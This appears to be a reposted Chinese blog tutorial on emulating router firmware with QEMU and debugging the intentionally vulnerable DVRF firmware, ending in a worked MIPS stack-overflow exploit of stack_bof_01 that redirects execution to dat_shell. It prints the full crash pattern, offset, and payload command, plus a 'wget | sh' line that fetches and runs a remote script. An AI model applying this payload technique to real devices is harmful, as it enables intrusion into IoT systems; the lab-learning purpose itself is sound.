目錄
- 前言
- 模擬執行韌體
- 除錯韌體
前言
動態分析韌體之前,需要先把韌體運行起來,但我們手頭又沒有路由器、攝像頭之類的物聯網硬體,該如何運行呢?這就需要虛擬執行,虛擬執行你就把它想象成一個虛擬機可以運行各種物聯網OS就是了,
QEMU這個模擬器想必都不陌生,一個近乎能夠模擬所有硬體設備的軟體,而Firmadyne這個工具,是一個基于QEMU的分析平臺,包含模擬、韌體提取、除錯等功能,
但該工具很難安裝,在kali上安裝一直報錯,人麻了,,,最終選擇用attifyti提供的物聯網滲透專用虛擬機,下載下來的檔案直接用vmware匯入就行了,
下載地址 https://www.dropbox.com/sh/xrfzyp1ex2uii53/AAAF0mdA1qFaEBDYZoIxaQRma?dl=0
模擬執行韌體
下載好虛擬機檔案匯入VM打開
下面我們來演示虛擬執行一個dlink韌體,
在tools/fat路徑下運行fat.py
腳本執行成功后,會回顯一個IP地址,這個IP就是模擬的韌體地址,
除錯韌體
以上只是簡單地演示如何虛擬執行一個韌體,下面我們就來實操如何通過動態除錯分析一個韌體,接下來的韌體采用DVRF,這是個網友自制的充滿漏洞的韌體,供學習用的,
git clone https://github.com/praetorian-code/DVRF.git
開始之前,安裝以下工具,動態除錯中會用到,
sudo apt install gdb-multiarch
wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
sudo pip3 install capstone unicorn keystone-engine
安裝keystone-engine時可能會報錯,參考這個鏈接,
https://github.com/avatartwo/avatar2/issues/23
安裝好工具后,就開始對韌體進行分析啦,韌體路徑如下,
DVRF/Firmware/DVRF_v03.bin
使用binwalk提取韌體檔案系統,
binwalk -t -e DVRF_v03.bin
提取出來的系統有個檔案夾pwnable,這個檔案夾就是存放著有漏洞的程式示例,我們選取緩沖區漏洞程式stack_bof_01進行實驗,首先使用readelf命令查看該程式的架構,
readelf -h pwnable/Intro/stack_bof_01
拷貝qwmu-mipsel-static到韌體根目錄:
cp (which qemu-mipsel-static) .
用qemu虛擬運行stack_bof_01,配合chroot虛擬執行stack_bof_01韌體,可以成功執行,qemu是一款輕型的虛擬機,
查看stack_bof_01的原始碼,可以發現明顯的strcpy記憶體溢位漏洞,當引數argv[1]超過200時,就會出現buf溢位的現象,
cat DVRF/Pwnable Source/Intro/stack_bof_01.c
以除錯的方式啟動程式,并在1234埠進行監聽除錯:
sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01
運行以下命令開始除錯,
gdb-multiarch pwnable/Intro/stack_bof_01
gdb運行后,會自動加載gef插件,然后設定韌體架構為mips,
set architecture mips
設定完遠程除錯的IP和埠,就可開始除錯stack_bof_01程式了,
target remote 127.0.0.1:1234
呼叫命令查看樣本的所有函式,可以看到各個函式的地址,
info functions
如果你感興趣,可以使用命令查反匯編看下main函式的匯編碼,這是mips架構的匯編碼,跟x86的相差很大,
然后我們使用命令創建一個隨機的300位元組流,作為攻擊字串,用于測驗引數溢位的點,
pattern create 300
重新帶引數除錯stack_bof_01,
sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac
gdb掛上去后,輸入c回車讓程式跑起來,會發現程式崩潰了,SIGSEGV記憶體出錯,指標ra指向0x63616162,對應的ASCII是”baac”,
使用命令查看該溢位點在攻擊字串的什么位置,是位于pattern的第204位,
pattern search 0x63616162
然后反匯編dat_shell函式,查看其函式地址,我們的目的是要讓程式本來執行0x63616162,變成執行dat_shell的地址,理論上應該把0x63616162改成0x400950,但除錯中發現,當執行到0x400970時,gp暫存器指向了不可訪問的地址,因此要略過前3條gp相關的指令,
將待執行的函式地址拼湊到204個位元組后面,便可劫持程式執行流到dat_shell函式(0x40095C),從而實作緩沖區溢位攻擊,
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 "$(python -c "print 'A'*204 + '\x5c\x09\x40'")"
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/294553.html
標籤:其他
上一篇:【計組】計算機基本組成原理